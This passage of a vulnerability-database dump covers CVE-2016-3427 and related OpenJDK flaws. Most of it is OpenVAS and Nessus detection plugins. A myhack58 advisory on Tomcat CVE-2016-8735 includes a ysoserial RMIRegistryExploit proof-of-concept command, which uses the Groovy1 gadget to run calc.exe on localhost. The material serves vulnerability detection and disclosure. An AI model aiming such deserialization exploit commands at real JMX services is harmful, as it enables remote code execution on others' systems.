value:\"Multiple flaws were found in OpenJDK. Please see the references for more information.\");\n script_tag(name:\"solution\", value:\"Run yum update java-1.8.0-openjdk to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-688.html\");\n script_cve_id(\"CVE-2016-0695\", \"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-3425\", \"CVE-2016-3427\", \"CVE-2016-3426\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2016 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1.8.0-openjdk-headless\", rpm:\"java-1.8.0-openjdk-headless~1.8.0.91~0.b14.10.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.8.0-openjdk-devel\", rpm:\"java-1.8.0-openjdk-devel~1.8.0.91~0.b14.10.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.8.0-openjdk-debuginfo\", rpm:\"java-1.8.0-openjdk-debuginfo~1.8.0.91~0.b14.10.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.8.0-openjdk-src\", rpm:\"java-1.8.0-openjdk-src~1.8.0.91~0.b14.10.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.8.0-openjdk-demo\", rpm:\"java-1.8.0-openjdk-demo~1.8.0.91~0.b14.10.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.8.0-openjdk\", rpm:\"java-1.8.0-openjdk~1.8.0.91~0.b14.10.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1.8.0-openjdk-javadoc\", rpm:\"java-1.8.0-openjdk-javadoc~1.8.0.91~0.b14.10.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:33", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-05-08T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for java-1_8_0-openjdk (openSUSE-SU-2016:1262-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3426", "CVE-2016-0695", "CVE-2016-3427", "CVE-2016-0687", "CVE-2016-3425", "CVE-2016-0686"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851306", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851306", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851306\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-05-08 05:19:18 +0200 (Sun, 08 May 2016)\");\n script_cve_id(\"CVE-2016-0686\", \"CVE-2016-0687\", \"CVE-2016-0695\", \"CVE-2016-3425\",\n \"CVE-2016-3426\", \"CVE-2016-3427\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for java-1_8_0-openjdk (openSUSE-SU-2016:1262-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1_8_0-openjdk'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for java-1_8_0-openjdk fixes the following security issues -\n April 2016 Oracle CPU (bsc#976340):\n\n - CVE-2016-0686: Unspecified vulnerability allowed remote attackers to\n affect confidentiality, integrity, and availability via vectors related\n to Serialization.\n\n - CVE-2016-0687: Unspecified vulnerability allowed remote attackers to\n affect confidentiality, integrity, and availability via vectors related\n to the Hotspot sub-component\n\n - CVE-2016-0695: Unspecified vulnerability allowed remote attackers to\n affect confidentiality via vectors related to the Security Component\n\n - CVE-2016-3425: Unspecified vulnerability allowed remote attackers to\n affect availability via vectors related to JAXP\n\n - CVE-2016-3426: Unspecified vulnerability allowed remote attackers to\n affect confidentiality via vectors related to JCE\n\n - CVE-2016-3427: Unspecified vulnerability allowed remote attackers to\n affect confidentiality, integrity, and availability via vectors related\n to JMX\n\n This update was imported from the SUSE:SLE-12-SP1:Update update project.\");\n\n script_tag(name:\"affected\", value:\"java-1_8_0-openjdk on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2016:1262-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk\", rpm:\"java-1_8_0-openjdk~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk-accessibility\", rpm:\"java-1_8_0-openjdk-accessibility~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk-debuginfo\", rpm:\"java-1_8_0-openjdk-debuginfo~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk-debugsource\", rpm:\"java-1_8_0-openjdk-debugsource~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk-demo\", rpm:\"java-1_8_0-openjdk-demo~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk-demo-debuginfo\", rpm:\"java-1_8_0-openjdk-demo-debuginfo~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk-devel\", rpm:\"java-1_8_0-openjdk-devel~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk-devel-debuginfo\", rpm:\"java-1_8_0-openjdk-devel-debuginfo~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk-headless\", rpm:\"java-1_8_0-openjdk-headless~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk-headless-debuginfo\", rpm:\"java-1_8_0-openjdk-headless-debuginfo~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk-src\", rpm:\"java-1_8_0-openjdk-src~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"java-1_8_0-openjdk-javadoc\", rpm:\"java-1_8_0-openjdk-javadoc~1.8.0.91~12.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2016-12-03T17:43:53", "description": "Background description\nTomcat is by Apache Software Foundation subordinate's Jakarta a project development Servlet vessel, in accordance with Sun Microsystems to provide the technical specifications, the realization of the Servlet and JavaServer Page\uff08JSP\uff09support, and provides as a[Web server](<http://www.myhack58.com/Article/sort099/sort0100/Article_100_1.htm>)some unique functions, like Tomcat managed and controls the platform, secure domain management and the Tomcat valve and so on. Tomcat is very popular with the majority of programmers like it, because it runs out system resources occupied by small, scalable, support load balancing and Mail Service, etc. the development of the application system commonly used functions. \nVulnerability description\nOracle fixes JmxRemoteLifecycleListener deserialization Vulnerability(CVE-2016-3427)\u3002 Tomcat also uses the JmxRemoteLifecycleListener this listener,but the Tomcat did not timely upgrade, so there is this remote code execution vulnerability. \nAffected version: \nApache Tomcat 9.0.0. M1 to 9.0.0. M11 \nApache Tomcat 8.5.0 to 8.5.6 \nApache Tomcat 8.0.0. RC1 to 8.0.38 \nApache Tomcat 7.0.0 to 7.0.72 \nApache Tomcat 6.0.0 to 6.0.47 \n\nThe impact of the scene: \nZabbix 2.0 has been the JMX monitoring added to the system, itself, is no longer dependent on third-party tools. This is on a Tomcat application and other Java application monitoring easier. Herein, a simple description Zabbix use JMX to monitor Tomcat process. \nVulnerability verification code\uff08POC\uff09: \nTested version: tomcat version 8. 0. 36 \nconf/server. xml to increase the configuration, add the catalina-jmx-remote. jar package, modify the catalina configuration file\n! [](/Article/UploadPic/2016-12/2016123165437471. png? www. myhack58. com) \n! [](/Article/UploadPic/2016-12/2016123165437789. png? www. myhack58. com) \nF:\\HackTools\\EXP>java-cp ysoserial-master-v0.0.4.jar ysoserial. exploit. RMIRegistryExploit localhost 10001 Groovy1 calc.exe \n! [](/Article/UploadPic/2016-12/2016123165437478. png? www. myhack58. com) \nThis vulnerability, there are other use posture, the harm is huge, so to change the JMX password authentication is very necessary! \nPatch code: \nDiff of /tomcat/trunk/webapps/docs/changelog.xml \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMssZ6ib2jHichpQZPKzXxyC4OOV1BOduzZShTCllbIINUL8AJzyMcEPrAA/0?wx_fmt=png?www.myhack58.com) \nParent Directory | \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMsxA7UdVzFs14K6cDMyEOpvxZpdRC7Mk3lxBGeicR22j3745Gv1Fp2y9Q/0?wx_fmt=png?www.myhack58.com) \nRevision Log | \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMs9Lu69oUq1a4myu0Zq8iajeqm48FVkLlNRP0cfuyiaqNiclqg82Uyj4iayw/0?wx_fmt=png?www.myhack58.com) \nPatch \n\\--- tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:28 1767643 \n+++ tomcat/trunk/webapps/docs/changelog.xml 2016/11/02 11:57:36 1767644 \n@@ -97,6 +97,10 @@ \nStoreConfig component includes the executor name when writing the \nThe Connector configuration. (markt) \n\n\\+ \n\\+ When configuring the JMX remote listener, specify the allowed types for \n\\+ the credentials. (markt) \n\\+ \n\n\n/tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMssZ6ib2jHichpQZPKzXxyC4OOV1BOduzZShTCllbIINUL8AJzyMcEPrAA/0?wx_fmt=png?www.myhack58.com) \nParent Directory | \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMsxA7UdVzFs14K6cDMyEOpvxZpdRC7Mk3lxBGeicR22j3745Gv1Fp2y9Q/0?wx_fmt=png?www.myhack58.com) \nRevision Log | \n! [](http://mmbiz.qpic.cn/mmbiz_png?www.myhack58.com/kjV6I7ricq6PBVL3l6EL6f9c8SoI4wqMs9Lu69oUq1a4myu0Zq8iajeqm48FVkLlNRP0cfuyiaqNiclqg82Uyj4iayw/0?wx_fmt=png?www.myhack58.com) \nPatch \n\\--- tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java 2016/11/02 11:57:28 1767643 \n\n\n**[1] [[2]](<81747_2.htm>) [next](<81747_2.htm>)**\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2016-12-03T00:00:00", "type": "myhack58", "title": "Apache Tomcat multiple versions of a remote code execution CVE-2016-8735(POC)-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3427"], "modified": "2016-12-03T00:00:00", "id": "MYHACK58:62201681747", "href": "http://www.myhack58.com/Article/html/3/62/2016/81747.htm", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-12-05T14:51:31", "description": "The VMware vSphere Replication running on the remote host is version 5.6.x prior to 5.6.0.6, 5.8.x prior to 5.8.1.2, 6.0.x prior to 6.0.0.3, or 6.1.x prior to 6.1.1. It is, therefore, affected by a remote code execution vulnerability in the Oracle JRE JMX component due to a flaw related to the deserialization of authentication credentials. An unauthenticated, remote attacker can exploit this to execute arbitrary code.\n\nNote that vSphere Replication is only affected if its vCloud Tunneling Agent is running, and it is not enabled by default.", "cvss3": {}, "published": "2016-06-03T00:00:00", "type": "nessus", "title": "VMware vSphere Replication Oracle JRE JMX Deserialization RCE (VMSA-2016-0005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427"], "modified": "2023-11-27T00:00:00", "cpe": ["x-cpe:/a:vmware:vsphere_replication"], "id": "VMWARE_VSPHERE_REPLICATION_VMSA_2016_0005.NASL", "href": "https://www.tenable.com/plugins/nessus/91457", "sourceData": "#TRUSTED a0a8a56676ba2daa63fefc63e218342e8f853a776ebb0959b0ac98f78ea765b0e1911019e1f4c2280b29a694ada62f00ac52a3b6244c25f3361bf2c7a85c32705e30294667aa4133ffede95d9317e414c0cc9ca23bc5f5d8631b5b125b1c1d795d49ec6f32e872282cc36ad782a0f841d7b3e0cd448dae688033e9d34e6a0ae4f2e498c45125a8478480f1b79f779ba7455864f62280be376e6caa5a6aadda3077a94f851af9eea5148e57fe9266c4cad14241d510c31438bbe67eb6a9a2e9cadc0408e9f85b88826d45699650817218af36ae0f95aa36b7e6dd2f8223244eb91c7f735ac60e166379143db93372d17f8fd4b0a92aa8510ddff08fff41a5ad66f43dc6636cfa606745a9edfc9854b050bd0b3de6cd8ba32fe75f8b36318ec7b4ac735a02b86262333b579f0c4ea6ba831c8b91d2a95a01e599b74e521a93fe744c5ee9e6f95ad06ad462cb0ff2069d0194535485e6253ca2be26279b3e48c84e3040700c55fee40cdb1b494f80ae3112d17a09508f96d9f2ad7682dde59c776dcf8b2be209eef2d469129a444efbd183c6269907a2ef654ffd1409c946ddbd9438c74757f2f7dcbf17fc374d7167afdfec3865b2dc0f9a5a7b540877c8e3f477a21f7d0fc075e2f3f100d59b599d711feb7e3f807825fe6ed4162b8c6d4c4b7948c0024574f8749e615b94bb9b33bbdf0bbfcd82f68b8f962923f126da12921f\n#TRUST-RSA-SHA256 27166f19dc05f3c3bcd8524d6098ef1725cfd9c544c91265565497c4d3a8941717c3ac13303c2730d28809ad6547574d427867c0a067b5b73967c868d6c292ff156cec85dfd8d40404c9a80cc76595c94f75c1890e903fd6dbbd21a7a1c73a004220a5976099b2f60cdb7b2a5922e3dd38bc130107ee620504b0793abcc008b1fa2d241f09bf03ab1a2e820fe275ed5f472074a2f86471a6453d1ac6d880e732acca2c01a142f4bb966a4704bfec7cc8d06ceea68680a7fff2718e62a346a8d77d15f35218a9c7782fe051a0882cc1c9cfb0f701317f8e4e362949d920dbd3141b809d46fb1ffbdba6c30f487674ead4cfce801716aadb046120c7251ee678b55046ce5db3f4aef013ec6678afea859b0146c092adf7fa93f4339dbb3f2722594682c74282b0b7522ebe16da401e4e6b3dc6138c49ba8e5beab1a229487196f065776c9db55571c5816f44c76fcbb9e4b559c9addf0b3e0243848a3815b6b1bd8b1de9d26217999d75aee549cb11b26cccaeb113357641e1c8ca8be58dcf4b38735de74724bd28e9d0dfcb52fd8ed74db454665a9f6ffb7a3c43f6eca170dcad8ea199e54a8e13749ef5cd87905079e4fa1ceb1090431c8f0444cc34b8b72f3b333bc12c955b133aa532a407284dedc65b1c606a13adaefd922913b11bc5a0c4db230707cda85f573d5aa45542eb43e22456411fa571c69566bcb485b150db98\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91457);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/27\");\n\n script_cve_id(\"CVE-2016-3427\");\n script_xref(name:\"VMSA\", value:\"2016-0005\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"VMware vSphere Replication Oracle JRE JMX Deserialization RCE (VMSA-2016-0005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is a virtualization appliance that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The VMware vSphere Replication running on the remote host is version\n5.6.x prior to 5.6.0.6, 5.8.x prior to 5.8.1.2, 6.0.x prior to\n6.0.0.3, or 6.1.x prior to 6.1.1. It is, therefore, affected by a\nremote code execution vulnerability in the Oracle JRE JMX component\ndue to a flaw related to the deserialization of authentication\ncredentials. An unauthenticated, remote attacker can exploit this to\nexecute arbitrary code.\n\nNote that vSphere Replication is only affected if its vCloud Tunneling\nAgent is running, and it is not enabled by default.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0005.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vSphere Replication version 5.6.0.6 / 5.8.1.2 /\n6.0.0.3 / 6.1.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3427\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:vmware:vsphere_replication\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vSphere Replication/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"hostlevel_funcs.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"misc_func.inc\");\n\n\nenable_ssh_wrappers();\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nversion = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Version\");\nverui = get_kb_item_or_exit(\"Host/VMware vSphere Replication/VerUI\");\nbuild = get_kb_item_or_exit(\"Host/VMware vSphere Replication/Build\");\n\nfix = '';\nvuln = FALSE;\n\nif (version =~ '^5\\\\.6\\\\.' && int(build) < 3845873) fix = '5.6.0.6 Build 3845873';\nelse if (version =~ '^5\\\\.8\\\\.' && int(build) < 3845890) fix = '5.8.1.2 Build 3845890';\nelse if (version =~ '^6\\\\.0\\\\.' && int(build) < 3845888) fix = '6.0.0.3 Build 3845888';\nelse if (version =~ '^6\\\\.1\\\\.' && int(build) < 3849281) fix = '6.1.1 Build 3849281';\n\nif (!empty(fix))\n{\n sock_g = ssh_open_connection();\n if (! sock_g)\n audit(AUDIT_HOST_NOT, \"able to connect via the provided SSH credentials.\");\n info_t = INFO_SSH;\n\n line = info_send_cmd(cmd:\"service vmware-vcd status\");\n ssh_close_connection();\n\n if (\n \"vmware-vcd-watchdog is running\" >< line &&\n \"vmware-vcd-cell is running\" >< line\n )\n {\n vuln = TRUE;\n }\n else\n exit(0, \"vCloud Tunneling Agent does not appear to be running on the VMware vSphere Replication appliance examined (Version \" + verui + \").\");\n\n}\n\nif (vuln)\n{\n report =\n '\\n Installed version : ' + verui +\n '\\n Fixed version : ' + fix +\n '\\n';\n\n security_report_v4(\n extra : report,\n port : '0',\n severity : SECURITY_HOLE\n );\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, 'VMware vSphere Replication', verui);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:29:56", "description": "The remote VMware vRealize Operations Manager (vROps) 6.x host is affected by a remote code execution vulnerability in the Oracle JRE JMX component due to a flaw related to the deserialization of authentication credentials. An unauthenticated, remote attacker can exploit this to execute arbitrary code.\n\nNote that only non-appliance versions of vRealize Operations Manager are affected by the vulnerability.", "cvss3": {}, "published": "2016-05-26T00:00:00", "type": "nessus", "title": "VMware VRealize Operations Manager 6.x Oracle JRE JMX Deserialization RCE (VMSA-2016-0005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427"], "modified": "2023-05-14T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA_2016_0005.NASL", "href": "https://www.tenable.com/plugins/nessus/91339", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91339);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2016-3427\");\n script_xref(name:\"VMSA\", value:\"2016-0005\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"VMware VRealize Operations Manager 6.x Oracle JRE JMX Deserialization RCE (VMSA-2016-0005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware vRealize Operations Manager (vROps) 6.x host is\naffected by a remote code execution vulnerability in the Oracle JRE\nJMX component due to a flaw related to the deserialization of\nauthentication credentials. An unauthenticated, remote attacker can\nexploit this to execute arbitrary code.\n\nNote that only non-appliance versions of vRealize Operations Manager\nare affected by the vulnerability.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2016-0005.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Block the appropriate ports per the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3427\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_vrealize_operations_manager_webui_detect.nbin\");\n script_require_ports(\"installed_sw/vRealize Operations Manager\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"webapp_func.inc\");\n\napp = \"vRealize Operations Manager\";\n\nif(get_install_count(app_name:app) == 0)\n audit(AUDIT_NOT_INST, app);\n\nport = get_http_port(default:443, embedded:TRUE);\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\n\nif (version !~ \"^6($|\\.)\")\n audit(AUDIT_INST_VER_NOT_VULN, app, version);\n\n# the mitigation is to firewall off the affected ports\n# check to see if we can establish a connection to port 9004 or 9005 (these are common among all affected versions).\n# if we can establish a connection, the remote host is likely vulnerable\nvuln = FALSE;\n\nsoc = open_sock_tcp(9004);\nport = 9004;\n\nif(!soc)\n{\n soc = open_sock_tcp(9005);\n port = 9005;\n}\n\nif(soc)\n{\n vuln = TRUE;\n close(soc);\n}\n\nif(!vuln)\n exit(0, \"Port 9004 and 9005 are not open on the remote host. Therefore, it is likely the mitigation has been applied or the host is an appliance.\");\n\nreport = '\\nVersion : ' + version + '\\n';\n\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T15:31:53", "description": "The version of VMware vCloud Director installed on the remote host is 5.5.x prior to 5.5.6.1, 5.6.x prior to 5.6.5.1, or 8.0.x prior to 8.0.1.1. It is, therefore, affected by a flaw in the bundled Oracle JRE JMX subcomponent due to deserializing any class when deserializing authentication credentials. An unauthenticated, remote attacker can exploit this to execute arbitrary code.", "cvss3": {}, "published": "2016-06-24T00:00:00", "type": "nessus", "title": "VMware vCloud Director 5.5.x < 5.5.6.1 / 5.6.x < 5.6.5.1 / 8.0.x < 8.0.1.1 JMX Deserialization RCE (VMSA-2016-0005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3427"], "modified": 